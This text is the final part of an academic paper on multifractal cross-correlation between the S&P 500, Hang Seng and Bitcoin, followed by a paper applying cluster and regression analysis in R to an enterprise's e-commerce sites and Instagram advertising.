Figure 9, where both the ΔL and ΔR measures are presented, gives us an idea of how the dominance of small and large fluctuations varies. The growth of ΔL is most noticeable during crash events such as the coronavirus pandemic, whereas ΔR starts to increase for small critical events. It is worth noting that for the pair S&P 500-HSI the distribution of large and small fluctuations seems relatively uniform. The dynamics of both indicators shows prospects for building effective trading strategies (Fig. 10).

The long tail type indicator ΔS shows us how the difference between the left and right tails changes. Here we expect that with a crisis event the indicator will decrease, which corresponds to the dominance of the left tail, i.e., of the multifractal properties of large events in the studied signal.

Figure 11 presents the dynamics of the asymmetry coefficient A for all of the studied pairs. Its growth is noticeable during the largest drops in the studied period. At the beginning, for the pair S&P 500-BTC, some of the signals generated by A seem to be spurious, as the correlation between them could be negative. For the other pairs, most of the time, our indicator behaves in an expected way (Fig. 12).

The height of f(α) demonstrates dynamics similar to ΔS. In this case we expect a higher probability of large fluctuations occurring as Δf decreases, and for small fluctuations we expect the opposite behavior. This indicator also presents a promising alternative for building reliable trading strategies.
Fig. 5. The comparative dynamics of S&P 500, HSI along with mid-term and long-term DCCA cross-correlation coefficients calculated for the pairs: S&P 500-BTC (a), HSI-BTC (b), and S&P 500-HSI (c)
Fig. 6. The comparative dynamics of S&P 500, HSI, and hxy calculated for the pairs: S&P 500-BTC (a), HSI-BTC (b), and S&P 500-HSI (c)
Fig. 7. The comparative dynamics of S&P 500, HSI, and Δα calculated for the pairs: S&P 500-BTC (a), HSI-BTC (b), and S&P 500-HSI (c)
Fig. 8. The comparative dynamics of S&P 500, HSI, and the α0, αmin, αmean, αmax measures calculated for the pairs: S&P 500-BTC (a), HSI-BTC (b), and S&P 500-HSI (c)
Fig. 9. The comparative dynamics of S&P 500, HSI, and the ΔL, ΔR measures calculated for the pairs: S&P 500-BTC (a), HSI-BTC (b), and S&P 500-HSI (c)
Fig. 10. The comparative dynamics of S&P 500, HSI, and the ΔS measure calculated for the pairs: S&P 500-BTC (a), HSI-BTC (b), and S&P 500-HSI (c)
Fig. 11. The comparative dynamics of S&P 500, HSI, and A measure calculated for the pairs: S&P 500-BTC (a), HSI-BTC (b), and S&P 500-HSI (c)
Fig. 12. The comparative dynamics of S&P 500, HSI, and the Δf measure calculated for the pairs: S&P 500-BTC (a), HSI-BTC (b), and S&P 500-HSI (c)
4 Discussion and Conclusions

In this study, we have analyzed the multifractal cross-correlation characteristics of the stock and cryptocurrency markets using multifractal detrended cross-correlation analysis. Using MF-DCCA and the sliding window approach, we have constructed indicators of cross-correlated behavior in the S&P 500, HSI, and BTC. The combination of both approaches makes it possible to present such measures as the DCCA correlation coefficient ρDCCA for short- and long-term behavior, the generalized cross-correlation Hurst exponent hxy, the width of the multifractal spectrum Δα, the singularity exponents α0, αmin, αmean, αmax, the widths of the left (ΔL) and right (ΔR) tails of f(α), the long tail type ΔS, the asymmetry coefficient A, and the height of the multifractal spectrum Δf.

Using the example of the S&P 500, HSI, and BTC, we have shown that most of the time the dynamics of the stock indices and the developing digital market remained anti-persistent during crisis events. Nevertheless, over the last years, their degree of cross-correlation has started to demonstrate synchronous behavior. The crashes of both markets are characterized by multifractality, which implies long-term memory for the pair of markets. By analyzing the cross-correlation coefficient ρDCCA versus time scale s, we have confirmed that the short-term cross-correlations between the stock and crypto markets are weak. Even the mid-term cross-correlations between the Chinese market and the crypto market remain insignificant. Both the S&P 500 and HSI indices are highly correlated despite some differences in their structure.

Most of our indicators show that after the COVID-19 crisis and the 2022 Russian invasion of Ukraine, which has resulted in a collapse of food supply, we may expect a higher degree of interconnection between the stock market and the cryptocurrency market. Our empirical analysis shows further prospects for constructing effective algorithmic strategies and forecasting models based on complex systems theory. In the future, it would be interesting to consider other methods of classical multifractal analysis or its cross-correlation modifications in combination with other methods of complex systems theory [3, 4, 26, 29, 30, 42–45, 49].

Acknowledgements. This work is part of the applied research "Monitoring, Forecasting, and Prevention of Crisis Phenomena in Complex Socio-Economic Systems", which is funded by the Ministry of Education and Science of Ukraine (project No. 0122U001694).
References

1. Aysan, A.F., Demir, E., Gozgor, G., Lau, C.K.M.: Effects of the geopolitical risks on Bitcoin returns and volatility. Res. Int. Bus. Financ. 47, 511–518 (2019)
2. Bariviera, A.F., Merediz-Sola, I.: Where do we stand in cryptocurrencies economic research? A survey based on hybrid analysis. J. Econ. Surv. 35, 377–407 (2021)
3. Bielinskyi, A., Semerikov, S., Serdyuk, O., Solovieva, V., Soloviev, V., Pichl, L.: Econophysics of sustainability indices. In: CEUR Workshop Proceedings, vol. 2713, pp. 372–392 (2020)
4. Bielinskyi, A., Soloviev, V.: Complex network precursors of crashes and critical events in the cryptocurrency market. In: CEUR Workshop Proceedings, vol. 2292, pp. 37–45 (2018)
5. Bielinskyi, A.O., Hushko, S.V., Matviychuk, A.V., Serdyuk, O.A., Semerikov, S.O., Soloviev, V.N.: Irreversibility of financial time series: a case of crisis. In: CEUR Workshop Proceedings, vol. 3048, pp. 134–150 (2021)
6. Bielinskyi, A.O., Serdyuk, O.A., Semerikov, S.O., Soloviev, V.N.: Econophysics of cryptocurrency crashes: a systematic review. In: CEUR Workshop Proceedings, vol. 3048, pp. 31–133 (2021)
7. Buszko, M., Orzeszko, W., Stawarz, M.: COVID-19 pandemic and stability of stock market - a sectoral approach. PLoS ONE 16, e0250938 (2021)
8. Chahuán-Jiménez, K., Rubilar, R., de la Fuente-Mella, H., Leiva, V.: Breakpoint analysis for the COVID-19 pandemic and its effect on the stock markets. Entropy 23, 100 (2021)
9. Chen, S.-P., He, L.-Y.: Multifractal spectrum analysis of nonlinear dynamical mechanisms in China's agricultural futures markets. Phys. A 389, 1434–1444 (2010)
10. Corbet, S., Lucey, B., Urquhart, A., Yarovaya, L.: Cryptocurrencies as a financial asset: a systematic analysis. Int. Rev. Financ. Anal. 62, 182–199 (2019)
11. Dai, M., Hou, J., Ye, D.: Multifractal detrended fluctuation analysis based on fractal fitting: the long-range correlation detection method for highway volume data. Phys. A 444, 722–731 (2016)
12. Dai, M., Zhang, C., Zhang, D.: Multifractal and singularity analysis of highway volume data. Phys. A 407, 332–340 (2014)
13. Dewandaru, G., Masih, R., Bacha, O., Masih, A.M.M.: Developing trading strategies based on fractal finance: an application of MF-DFA in the context of Islamic equities. Phys. A 438, 223–235 (2015)
14. Drożdż, S., Kowalski, R., Oświęcimka, P., Rak, R., Gębarowski, R.: Dynamical variety of shapes in financial multifractality. Complexity 2018, 13 (2018)
15. Drożdż, S., Kwapień, J., Oświęcimka, P., Stanisz, T., Wątorek, M.: Complexity in economic and social systems: cryptocurrency market at around COVID-19. Entropy 22, 1043 (2020)
16. Drożdż, S., Oświęcimka, P.: Detecting and interpreting distortions in hierarchical organization of complex time series. Phys. Rev. E 91, 030902 (2015)
17. Flori, A.: Cryptocurrencies in finance: review and applications. Int. J. Theor. Appl. Financ. 22, 1950020 (2019)
18. Frisch, U., Parisi, G.: On the singularity structure of fully developed turbulence. In: Ghil, M., Benzi, R., Parisi, G. (eds.) Turbulence and Predictability of Geophysical Flows and Climate Dynamics, pp. 84–88. North-Holland, New York (1985)
19. Gerlach, J.-C., Demos, G., Sornette, D.: Dissection of Bitcoin's multiscale bubble history from January 2012 to February 2018. R. Soc. Open Sci. 6, 180643 (2019)
20. Grassberger, P.: Generalized dimensions of strange attractors. Phys. Lett. A 97, 227–230 (1983)
21. Halsey, T.C., Jensen, M.H., Kadanoff, L.P., Procaccia, I., Shraiman, B.I.: Fractal measures and their singularities: the characterization of strange sets. Phys. Rev. A 33, 1141 (1986)
22. Hurst, H.E.: Long-term storage capacity of reservoirs. Trans. Am. Soc. Civ. Eng. 116, 770–799 (1951)
23. Ihlen, E.A.F.: Introduction to multifractal detrended fluctuation analysis in Matlab. Front. Physiol. 3, 141 (2012)
24. James, N., Menzies, M.: Association between COVID-19 cases and international equity indices. Phys. D 417, 132809 (2021)
25. James, N., Menzies, M.: Efficiency of communities and financial markets during the 2020 pandemic. Chaos 31, 083116 (2021)
26. Jiang, Z.-Q., Zhou, W.-X.: Multifractal detrending moving-average cross-correlation analysis. Phys. Rev. E 84, 016106 (2011)
27. Kantelhardt, J.W., Zschiegner, S.A., Koscielny-Bunde, E., Bunde, A., Havlin, S., Stanley, H.E.: Multifractal detrended fluctuation analysis of non-stationary time series. Phys. A 316, 87–114 (2002)
28. Katsiampa, P., Yarovaya, L., Zięba, D.: High-frequency connectedness between Bitcoin and other top-traded crypto assets during the COVID-19 crisis. J. Int. Fin. Mark. Inst. Money (2022)
29. Kiv, A.E., et al.: Machine learning for prediction of emergent economy dynamics. In: CEUR Workshop Proceedings, vol. 3048, pp. i–xxxi (2021)
30. Kristoufek, L.: Multifractal height cross-correlation analysis: a new method for analyzing long-range cross-correlations. EPL (Europhys. Lett.) 95, 68001 (2011)
31. Li, J., Lu, X., Zhou, Y.: Cross-correlations between crude oil and exchange markets for selected oil rich economies. Phys. A 453, 131–143 (2016)
32. Lo, A.W.: Long-term memory in stock market prices. Econometrica 59, 1279–1313 (1991)
33. Lu, X., Li, J., Zhou, Y., Qian, Y.: Cross-correlations between RMB exchange rate and international commodity markets. Phys. A 486, 168–182 (2017)
34. Lu, X., Tian, J., Zhou, Y., Li, Z.: Multifractal detrended fluctuation analysis of the Chinese stock index futures market. Phys. A 392, 1452–1458 (2013)
35. Ma, F., Wei, Y., Huang, D., Zhao, L.: Cross-correlations between West Texas intermediate crude oil and the stock markets of the BRIC. Phys. A 392, 5356–5368 (2013)
36. Ma, F., Wei, Y., Huang, D.: Multifractal detrended cross-correlation analysis between the Chinese stock market and surrounding stock markets. Phys. A 392, 1659–1670 (2013)
37. Maheu, J.M., McCurdy, T.H., Song, Y.: Bull and bear markets during the COVID-19 pandemic. Fin. Res. Lett. 42, 102091 (2021)
38. Meakin, P.: Fractals, Scaling and Growth far from Equilibrium. Cambridge University Press, Cambridge (1998)
39. Oświęcimka, P., Livi, L., Drożdż, S.: Right-side-stretched multifractal spectra indicate small-worldness in networks. Commun. Nonlinear Sci. Numer. Simul. 57, 231–245 (2018)
40. Peng, C.K., Buldyrev, S.V., Havlin, S., Simons, M., Stanley, H.E., Goldberger, A.L.: Mosaic organization of DNA nucleotides. Phys. Rev. E 49, 1685–1689 (1994)
41. Podobnik, B., Stanley, H.E.: Detrended cross-correlation analysis: a new method for analyzing two non-stationary time series. Phys. Rev. Lett. 100, 084102 (2008)
42. Qian, X.-Y., Liu, Y.-M., Jiang, Z.-Q., Podobnik, B., Zhou, W.-X., Stanley, H.E.: Detrended partial cross-correlation analysis of two nonstationary time series influenced by common external forces. Phys. Rev. E 91, 062816 (2015)
43. Soloviev, V., Bielinskyi, A., Serdyuk, O., Solovieva, V., Semerikov, S.: Lyapunov exponents as indicators of the stock market crashes. In: CEUR Workshop Proceedings, vol. 2732, pp. 455–470 (2020)
44. Soloviev, V., Bielinskyi, A., Solovieva, V.: Entropy analysis of crisis phenomena for DJIA index. In: CEUR Workshop Proceedings, vol. 2393, pp. 434–449 (2019)
45. Soloviev, V.N., Bielinskyi, A.O., Kharadzjan, N.A.: Coverage of the coronavirus pandemic through entropy measures. In: CEUR Workshop Proceedings, vol. 2832, pp. 24–42 (2020)
46. Song, R., Shu, M., Zhu, W.: The 2020 global stock market crash: endogenous or exogenous? Phys. A 585, 126425 (2022)
47. Sornette, D.: Critical Phenomena in Natural Sciences: Chaos, Fractals, Self-Organization and Disorder. Concepts and Tools. Springer, Heidelberg (2006). https://doi.org/10.1007/3-540-33182-4
48. The official page of "Yahoo! Finance" (1997). https://finance.yahoo.com
49. Wang, J., Shang, P., Ge, W.: Multifractal cross-correlation analysis based on statistical moments. Fractals 20, 271–279 (2012)
50. Wątorek, M., Drożdż, S., Kwapień, J., Minati, L., Oświęcimka, P., Stanuszek, M.: Multiscale characteristics of the emerging global cryptocurrency market. Phys. Rep. 901, 1–82 (2021)
51. Xia, S., Huiping, C., Ziqin, W., Yongzhuang, Y.: Multifractal analysis of Hang Seng index in Hong Kong stock market. Phys. A 291, 553–562 (2001)
52. Zebende, G.: DCCA cross-correlation coefficient: quantifying level of cross-correlation. Phys. A 390, 614–618 (2011)
53. Zhang, D., Hu, M., Ji, Q.: Financial markets under the global pandemic of COVID-19. Fin. Res. Lett. 36, 101528 (2020)
54. Zhang, W., Wang, P., Li, X., Shen, D.: Twitter's daily happiness sentiment and international stock returns: evidence from linear and nonlinear causality tests. J. Behav. Exp. Fin. 18, 50–53 (2018)
55. Zhang, Z., Zhang, Y., Shen, D., Zhang, W.: The dynamic cross-correlations between mass media news, new media news, and stock returns. Complexity 2018, 1–11 (2018)
56. Zhou, W.X.: Multifractal detrended cross-correlation analysis for two nonstationary signals. Phys. Rev. E 77, 066211 (2008)
57. Zou, Y., Donner, R.V., Marwan, N., Donges, J.F., Kurths, J.: Complex network approaches to nonlinear time series analysis. Phys. Rep. 787, 1–97 (2019)
Using Data Science Tools in E-Commerce: Client's Advertising Campaigns vs. Sales of Enterprise Products

Tetiana Zatonatska1, Tomasz Wołowiec2, Oleksandr Dluhopolskyi2,3(B), Oleksandr Podskrebko1, and Olena Maksymchuk1

1 Taras Shevchenko National University of Kyiv, Kyiv, Ukraine
2 Higher School of Economics and Innovation, Lublin, Poland
[email protected]
3 West Ukrainian National University, Ternopil, Ukraine
Abstract. Quarantine measures to prevent the spread of the COVID-19 pandemic have led to rapid growth of the e-retail market. Online shopping has become commonplace and, for some groups of people, the only way to provide themselves with resources. Therefore, due to the excessive accumulation of online data, modern methods of analysis are necessary. Based on a literature overview of the possibilities of using data science tools, such methods and models for processing e-commerce data as data mining (cluster analysis, regression analysis, classification), machine learning, artificial neural networks, visualization, and more have been identified. The purpose of the article is to build a data processing model for improving the efficiency of e-commerce. The authors propose a cluster analysis of the online marketplaces selling the household products of an enterprise. Ward's method and cluster visualization have been used during the modeling. Of the identified methods and models for e-commerce data processing, the authors apply cluster analysis and regression analysis. As a result, each cluster is evaluated according to statistical indicators. Options for the development of e-commerce and improvement of the marketing strategy are also proposed: the use of advertising on social networks can significantly increase e-sales, while investing in print media is inefficient. Thus, the use of the built model is effective for improving sales and planning marketing costs. The possibilities of using data science tools in e-commerce analysis are a key area for attracting customers, expanding business, and increasing revenue.

Keywords: E-commerce · data science · big data · cluster analysis · regression analysis
1 Introduction

Due to the pandemic, e-commerce has experienced incredible growth and the arrival of new consumers. Many companies have had to close their outlets and continue to do business only through online platforms. Online shopping has become commonplace and, for some groups of society, the only way to provide themselves with resources while staying safe.
Today, there is increasing evidence of significant growth in e-commerce in both the B2C and B2B segments. For example, Amazon's global sales grew by 26% in the first quarter of 2020 (Amazon, 2020). In the case of the number of online orders in April 2020, the United States and Canada saw an even more impressive increase of almost 2.5 times compared to the spring of 2019 (Forbes, 2020). In the B2C segment, this trend was particularly strong in the markets for medical devices, necessities and household goods, food, electronics, etc. For example, according to a study by Deloitte (Deloitte, 2020), in Denmark 65% of food companies reported an increase of more than 10% compared to what was expected earlier, while sales of luxury goods and interior items, on the contrary, decreased. According to Statista (Statista, 2021), the global e-commerce retail market reached 4.280 trillion US dollars in 2020, a 27% growth compared to 2019, and, according to forecasts, the e-commerce market will grow rapidly and reach 6.388 trillion US dollars by 2024 (Fig. 1). The growth of the e-commerce market in Ukraine under the influence of the pandemic is also intensive. According to the EVO group of companies (E-commerce, 2021), in 2020 the volume of the e-commerce market in Ukraine reached 4.0 billion dollars, which is 8.8% of total retail sales and 41% higher than e-sales in 2019. The active growth of the e-commerce market is accompanied by an increase in the amount of information accumulated using the latest technologies. This, in turn, makes it possible to use advanced approaches and data analysis tools to study consumer behavior and business efficiency, optimize costs, and adapt to current trends.
Fig. 1. Retail e-commerce sales in the world from 2014 to 2024, billion U.S. dollars (values for 2022–2024 are forecasts). Source: own research based on (Statista, 2021)
One such tool is Data Science, which includes methods, processes, and systems for obtaining information from structured and unstructured data. Thus, the aim of the study is to identify existing modern Data Science methods for the analysis of e-commerce data, as well as to develop a model that will help to increase sales of goods on online platforms. In accordance with the goal of building a data processing model for improving the efficiency of e-commerce, cluster analysis and a regression model have been used. All modeling is implemented in the R-Studio software environment.
2 Theoretical Background

The active growth of the e-commerce market is accompanied by an increase in the amount of information accumulated through the latest technologies. This, in turn, requires the use of advanced approaches, methods, and technological means for its storage, processing, and use. The topic of big data is still ambiguous but continues to be actively studied by experts in various fields (economics, information technology, politics, etc.). However, the ability to store data and perform various calculations with it does not by itself give a competitive advantage. Data Science is used for data analysis to solve various business problems.

Unlike the term "big data", which gained popularity in the 2010s, the concept of "data science" appeared much earlier, namely in the second half of the 20th century. The beginning of this discipline is considered to be 1966, when the Committee on Data of the International Science Council (CODATA) was founded, and the first mention of this concept dates back to 1975 with the publication of the book "Concise Survey of Computer Methods" by P. Naur (Naur, 1975). It defines data science as the discipline of studying the life cycle of digital data – from their creation to processing and use in other fields. However, this term became widely used only in the 1990s, and only in the early 2000s did it become generally accepted. Interest in data science increased with the popularization of the concept of big data in 2010, when the computing power of even home computers already allowed working with large amounts of data.

Thus, data science is an interdisciplinary field of scientific methods, processes, and systems related to obtaining information from structured and unstructured data. Data science is a continuation of such areas of data analysis as statistics, clustering, classification, machine learning, forecasting, and others. Data science as a field is very popular but still poorly formalized. Today, different companies still have different understandings of the terms "data science" and "data scientist", but they all share a common goal – to use data to gain a competitive advantage. Data scientists use the data stored with big data technologies to build analytical, statistical, data mining, and machine learning models that can answer the questions "what happened", "why did it happen", "what will happen", and "what should be done next".

Existing research demonstrates that using data science tools can enable a company to reap a number of benefits, such as (Mykhalchuk et al., 2021; Yue, Li, 2018; Kovtoniuk et al., 2021; Zatonatska, Dluhopolskyi, 2019; Panchenko et al., 2021; Dluhopolskyi et al., 2021; Zatonatska et al., 2019; Zatonatska et al., 2021; Zatonatska et al., 2022; Fedirko et al., 2021; Rymarczyk et al., 2021): improving pricing strategies for goods and services; creation of targeted advertising; improving the link between research and
development of new products; improving customer service; improving the quality of multi-channel integration and coordination; expanding global search sources from multiple business units and locations; achieving greater business efficiency through the creation and implementation of new models.

The use of data science methods in e-commerce has been the subject of many studies. S.S. Alrumiah and M. Hadwan (Alrumiah, Hadwan, 2021) theoretically investigated the value, for suppliers and consumers, of introducing big data analytics (BDA) in e-commerce. The authors found that companies used BDA to understand consumer behavior and increase customer loyalty. In addition, the recommendations obtained during big data analysis personalized the shopping search for consumers. However, the authors also highlighted negative consequences of using BDA in e-commerce, such as dependence on data availability. In addition, accumulating data and implementing a system for their analysis were costly from a financial point of view. In conclusion, the authors noted that although BDA is improving e-commerce, rapid data growth is still a challenge today.

Sh. Akter and S.F. Wamba (Akter, Wamba, 2016) presented the aspects, distinctive characteristics, types, business value, and problems of big data analysis in e-commerce. The article contains extensive discussion of future problems and opportunities in the theory and practice of using data science. The results of the study synthesize various concepts of big data analysis, which give a deeper idea of the cross-cutting analytical possibilities of data science methods, using the example of leading companies in the world (such as Amazon, Netflix, Google, etc.).

The purpose of the empirical research of Y. Cheng, Y. Yang, J. Jiang, and G.C. Xu (Cheng et al., 2015) was to solve the problem of evaluating e-commerce sites. The researchers considered data mining one of the effective methods for solving this problem. Factor analysis and the DBSCAN data clustering algorithm were used to evaluate the performance of 100 sites, and an improved DBSCAN algorithm was presented. As a result, the researchers proposed options for improving the considered input parameters for each cluster of sites (number of users with access to the site, number of site views, number of visits to the site, site speed, site size, etc.).

D. Malhotra and O. Rishi (Malhotra, Rishi, 2021) investigated the shortcomings of product search systems in e-commerce and addressed the problem of making decisions about online shopping. In the modeling, an innovative page ranking algorithm based on second-generation HDFS-MapReduce, the relevance vector (RV) algorithm, was developed and put into practice. The proposed approach satisfies critical parameters such as scalability, support for partial failures, extensibility, and so on. Extensive experimental evaluation shows the effectiveness and efficiency of the proposed RV page ranking algorithm and the IMSS-AE tool compared to other popular search engines.
Q. Wang, R. Cai and M. Zhao (Wang et al., 2020) studied the impact of online marketing on brand development using data science methods. Linear regression and support vector regression (SVR) were used in the simulation. The resulting model can be used to forecast the financial performance of an enterprise, as well as to improve the effectiveness of brand marketing. Therefore, based on current research on the possibilities of data science tools, the authors chose cluster analysis and regression analysis as the methods and models for e-commerce data processing.
3 Research Objective, Methodology and Data The authors developed a model for clustering the sites of a household chemicals supplier on the Ukrainian market and built a regression model. The task of the clustering model is to identify several clusters of sites and, on this basis, to make an evaluation for improving e-sales and the marketing strategy. The purpose of the regression model is to verify the relationship between the client's advertising campaign on Instagram and the dynamics of sales of the enterprise's products on the client's site. The client's Instagram page publishes news about a wave of discounts on goods of a certain brand; each publication contains a link to the online store's website, where the user can view the entire promotional range and buy it. To implement the model, data of the household chemicals enterprise were used, covering e-sales of the enterprise's goods on 72 Internet sites, described by 9 characteristics, during 2020 (Table 1, Appendix A).

Table 1. Fragment of descriptive statistics of the studied data set. Source: own evaluation

| № | Name of site | Income (X1) | Income per month (X2) | Marginality (X3) | Visitors (X4) | Av. price per unit (X5) | Conversion (X6) | Complexity (X7) | Units (X8) | Transactions (X9) |
|---|---|---|---|---|---|---|---|---|---|---|
| 1 | allo.ua | 223,770 | 31,967 | 84 | 11,152,580 | 25.85 | 15 | 1.7985 | 8,658 | 4,814 |
| 2 | aquamarket.com | 361,151 | 51,593 | 85 | 844,240 | 24.3 | 16 | 2.2535 | 14,862 | 6,595 |
| 3 | atbmarket.ua | 1,096,617 | 156,660 | 85 | 661,860 | 39.94 | 9 | 1.54 | 27,456 | 17,829 |
| … | … | … | … | … | … | … | … | … | … | … |
| 71 | zacupca.com | 633,359 | 90,480 | 86 | 3,802,980 | 43.45 | 6 | 1.3587 | 14,578 | 10,729 |
| 72 | zapmeta.ua | 801,687 | 114,527 | 84 | 3,382,500 | 37.27 | 9 | 1.4058 | 21,512 | 15,302 |
The input characteristics of the sites are: X1 – annual income from the sale of goods, thousands of UAH; X2 – average monthly income from sales of goods, thousands of UAH; X3 – margin of sales realized on the site during the period, %; X4 – number of site visitors during the period; X5 – average unit cost of goods, UAH; X6 – site conversion (number of visitors who purchased products / number of site visitors), %; X7 – complexity of the check (number of purchased goods / number of transactions containing at least 1 unit of goods); X8 – number of units sold per year, pcs.; X9 – number of transactions implemented on the site during the period. Two databases were used for the study. The first database contained daily information on the number of visits to the site and subsequent orders for promotional products within a month. The second database contained the following indicators (daily, within a month):
• number of community followers, persons;
• number of community visitors, persons;
• content diversity – the ratio of the number of content types to the number of publications per day, %;
• audience engagement, or ERday (%) – the ratio of the sum of all user actions (e.g., comments) per day to the total number of community members;
• coverage – the number of users who saw the post;
• the day the publication was made (1 – weekday, 0 – weekend);
• number of visits to the online store site.
4 Results Ward's method was used for agglomeration, with the squared Euclidean distance as the dissimilarity measure, as this method requires; the computations were performed in the RStudio environment (a minimal sketch of this step is given after Fig. 2 below). After implementing hierarchical cluster analysis by Ward's method and obtaining a preliminary dendrogram, the authors identified k = 4 clusters by expert assessment (Fig. 2) and obtained the characteristics of each cluster. According to the results of the cluster analysis, the 72 sites were divided into 4 clusters. The authors formed the following conclusions about the clusters based on the statistical indicators (Tables 2 and 3):
• cluster 1: is the smallest one and has the lowest average complexity of the check (1.39), which indicates mostly impulse purchases and low interest of visitors in goods of this category or brand; the cluster's sites nevertheless have high prospects and offer an opportunity to increase sales;
• cluster 2: has the lowest income and margin (83%), as well as the lowest numbers of transactions and units purchased, but the highest conversion and check complexity, which indicates a well-targeted assortment on these sites;
• cluster 3: sites of this cluster have the highest margin and average unit price, but the lowest conversion rates, which also indicates low interest of visitors to these sites in the household chemicals segment;
• cluster 4: is the largest one and shows the highest indicators of income, number of transactions and purchased units.
Fig. 2. Dendrogram obtained from hierarchical cluster analysis by Ward's method. Source: own research
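A minimal sketch of this clustering step, in R (the environment named above), is given below. The file name, the "Name" column and the column names X1–X9 are illustrative assumptions, not the authors' actual script.

```r
# Minimal sketch of the clustering step, assuming the 72 sites are stored in a
# hypothetical file "e_sites.csv" with a "Name" column and characteristics X1-X9.
sites <- read.csv("e_sites.csv")

# Standardize the characteristics so that scale differences
# (e.g., income vs. conversion) do not dominate the distances.
x <- scale(sites[, paste0("X", 1:9)])

d  <- dist(x)^2                     # squared Euclidean distance, as described above
hc <- hclust(d, method = "ward.D")  # Ward agglomeration on squared distances

plot(hc, labels = sites$Name)       # preliminary dendrogram (cf. Fig. 2)
cl <- cutree(hc, k = 4)             # expert-chosen number of clusters

# Per-cluster summaries analogous to Tables 2 and 3
aggregate(sites[, paste0("X", 1:9)], by = list(cluster = cl), FUN = mean)
```

With method = "ward.D", hclust expects squared dissimilarities, which matches the squared Euclidean distance described above; the alternative "ward.D2" squares the distances internally.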
Table 2. Statistical features of clusters 1 and 2. Source: own research

| Indicator | Cluster 1: mean | Cluster 1: median | Cluster 1: min | Cluster 1: max | Cluster 2: mean | Cluster 2: median | Cluster 2: min | Cluster 2: max |
|---|---|---|---|---|---|---|---|---|
| Income | 397,107 | 396,713 | 172,357 | 801,687 | 281,230 | 229,765 | 118,862 | 664,340 |
| Income per month | 56,730 | 56,673 | 24,622 | 114,527 | 40,883 | 32,824 | 22,883 | 94,906 |
| Marginality | 85% | 86% | 74% | 87% | 83% | 83% | 78% | 86% |
| Visitors | 2,685,668 | 2,144,880 | 1,025,660 | 11,152,580 | 943,336 | 839,550 | 357,660 | 2,359,240 |
| Av. price per unit | 34 | 34 | 25.8 | 46.9 | 26.7 | 25.5 | 24.1 | 34.3 |
| Conversion | 8% | 8% | 1% | 15% | 13% | 11% | 8% | 30% |
| Complexity | 1.39 | 1.34 | 1.25 | 1.8 | 1.83 | 1.81 | 1.55 | 2.25 |
| Units | 11,686 | 11,679 | 5,389 | 21,512 | 10,456 | 8,718 | 4,723 | 19,359 |
| Transactions | 8,430 | 8,810 | 3,973 | 15,302 | 5,722 | 4,714 | 2,576 | 10,716 |
| Number of sites | 8 | | | | 18 | | | |
Table 3. Statistical features of clusters 3 and 4. Source: own research

| Indicator | Cluster 3: mean | Cluster 3: median | Cluster 3: min | Cluster 3: max | Cluster 4: mean | Cluster 4: median | Cluster 4: min | Cluster 4: max |
|---|---|---|---|---|---|---|---|---|
| Income | 916,162 | 975,483 | 479,030 | 1,217,189 | 1,768,458 | 1,564,635 | 1,360,941 | 2,654,074 |
| Income per month | 130,880 | 139,355 | 68,433 | 173,884 | 252,637 | 223,519 | 194,420 | 379,153 |
| Marginality | 87% | 87% | 84% | 89% | 86% | 86% | 84% | 87% |
| Visitors | 4,397,544 | 4,072,380 | 661,860 | 8,835,300 | 5,783,028 | 5,432,060 | 2,147,780 | 9,547,520 |
| Av. price per unit | 43 | 43 | 35.3 | 66.3 | 37.1 | 36.7 | 34.7 | 40.1 |
| Conversion | 8% | 7% | 5% | 11% | 12% | 9% | 6% | 36% |
| Complexity | 1.41 | 1.38 | 1.2 | 1.75 | 1.55 | 1.51 | 1.39 | 1.97 |
| Units | 21,884 | 24,349 | 12,391 | 31,807 | 47,956 | 42,879 | 34,717 | 76,398 |
| Transactions | 15,483 | 15,890 | 9,177 | 22,648 | 30,535 | 28,522 | 22,802 | 41,443 |
| Number of sites | 15 | | | | 31 | | | |
It is important to understand whether there is a relationship between visits arriving through the link in a publication and the number of orders on the website. In the linear regression, the dependent variable Y is the number of sales and the independent variable X is the number of visits to the online store site (Fig. 3). Given the model's adequacy (R² = 0.9316, p-value < 0.05), the authors concluded that the number of purchases depends very strongly on the number of visits to the online store.
Fig. 3. The result of linear regression. Source: own research
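A minimal sketch of this regression in R is given below; the file name and the column names "visits" and "sales" are hypothetical stand-ins for the first (daily) database.

```r
# Sketch of the simple regression behind Fig. 3, on the first daily database.
# "db1_daily.csv", "visits" and "sales" are assumed names for illustration.
db1 <- read.csv("db1_daily.csv")

fit <- lm(sales ~ visits, data = db1)
summary(fit)            # reports R-squared (0.9316 in the paper) and p-values

# Under a linear dependence, the slope estimates the sales conversion rate
# (18.33% according to the authors' model).
coef(fit)["visits"]
```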
If we accept the linear nature of the dependence between the two indicators, the coefficient of this regression characterizes the sales conversion; according to the model, the site's conversion rate is 18.33%. Then, using multiple regression on the two databases (Fig. 4), the authors determined which indicators of the site have the greatest impact on sales. In this model the independent variables are: X1 – audience engagement (ER_day); X2 – content diversity (cont_div); X3 – number of community followers (group_size); X4 – coverage (coverage); X5 – number of community visitors (visitors).
Fig. 4. The result of multiple regression. Source: own research
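The multiple regression of Fig. 4 can be sketched in the same way; the data frame name and the response column "store_visits" (the number of visits to the online store site) are assumptions, while the predictor names follow the notation in the text.

```r
# Sketch of the multiple regression behind Fig. 4, on the second daily database.
# "db2_daily.csv" and the response column "store_visits" are assumed names;
# the predictors follow the ER_day, cont_div, group_size, coverage, visitors
# notation used in the text.
db2 <- read.csv("db2_daily.csv")

fit2 <- lm(store_visits ~ ER_day + cont_div + group_size + coverage + visitors,
           data = db2)
summary(fit2)   # per-coefficient t-tests show which indicators matter
```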
5 Discussion The regression analysis has shown that there is no direct relationship between individual characteristics of publications and the customer's intention to make a purchase. In general, the number of site visitors depends on the number of visitors to the client's community. The indicator "group size" can also be taken into account, although its impact is almost insignificant. The built model is unique: 72 randomly selected e-commerce sites were researched and grouped into 4 clusters, 9 criteria were analyzed, and proposals for the business units of each cluster were formulated. Similar studies by other authors have not been found.
6 Conclusions Based on the regression analysis, the following conclusions were formed: the use of such a marketing tool as publishing information about promotional activities on social networks effectively increases the number of e-sales; the kind of publication does not have a direct impact on the number of sales, so spending financial resources on diversifying publications is not effective. Given the specifics of each cluster, the authors have made the following recommendations for the enterprise:
• cluster 1: place banners and other marketing tools on the sites to increase the visibility of products;
• cluster 2: place the assortment with higher margin;
• cluster 3: increase the visibility of products (placement of banners, etc.), supported by promotions, which will affect margins but increase the interest of visitors;
• cluster 4: given the best performance among the clusters, it is enough to support the current selling concept.
